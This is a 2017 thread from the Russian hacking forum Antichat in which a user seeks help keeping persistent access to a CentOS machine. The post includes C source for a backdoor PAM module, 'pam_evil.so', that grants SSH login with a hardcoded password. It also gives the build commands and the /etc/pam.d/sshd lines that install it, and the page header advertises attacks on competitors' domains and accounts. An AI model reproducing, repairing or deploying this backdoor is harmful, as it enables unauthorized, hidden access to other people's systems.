Помогите закрепится в системе(Linux+pam)

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Помогите закрепится в системе(Linux+pam)

Опции темы

Поиск в этой теме

Опции просмотра

06.12.2017, 09:35

anb90210

Новичок

Регистрация: 17.10.2017

Сообщений: 3

С нами: 4512566

Репутация: 0

Здравствуйте.

Имеется доступ к системе Linux centos

Посоветуйте как закрепиться через pam модули. Пробовал метод из статьи (Хакер 2017 01(216) nix бэкдо быстрого приготовления).

Но после изменений в /etc/pam.d/sshd и добавления своего модуля pam_evil.so перестаёт работать нормальная аутентификация(не пускает по валидному паролю)

Вот так создавал новый модуль:

Код:

#include 
#include 
#include 
#include 
#include 
#include 

#define MYPASSWD "testpass"

PAM_EXTERN int pam_sm_setcred(pam_handle_t * pamh, int flags, int argc, const char **argv)
{
    return PAM_SUCCESS;
}

PAM_EXTERN int pam_sm_acct_mgmt(pam_handle_t * pamh, int flags, int argc, const char **argv)
{
    return PAM_SUCCESS;
}

PAM_EXTERN int pam_sm_authenticate(pam_handle_t * pamh, int flags, int argc, const char **argv)
{
    char *password = NULL;

    pam_get_authtok(pamh, PAM_AUTHTOK, (const char **)&password, NULL);   

    if (!strncmp(password,MYPASSWD, strlen(MYPASSWD)))
    return PAM_SUCCESS;

    return -1;
}

Вот так собирал:

gcc -fPIC -c pam_evil.c

ld -x --shared -o pam_evil.so pam_evil.o

Вот так добавлялся в pam - /etc/pam.d/sshd:

auth sufficient pam_evil.so

account sufficient pam_evil.so

Хочется именно этот метод. Ратник самому писать лень. Может кто исследовал эту тему??? Пните в нужно направлении!

𝕏 Twitter Reddit Telegram Копировать ссылку

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход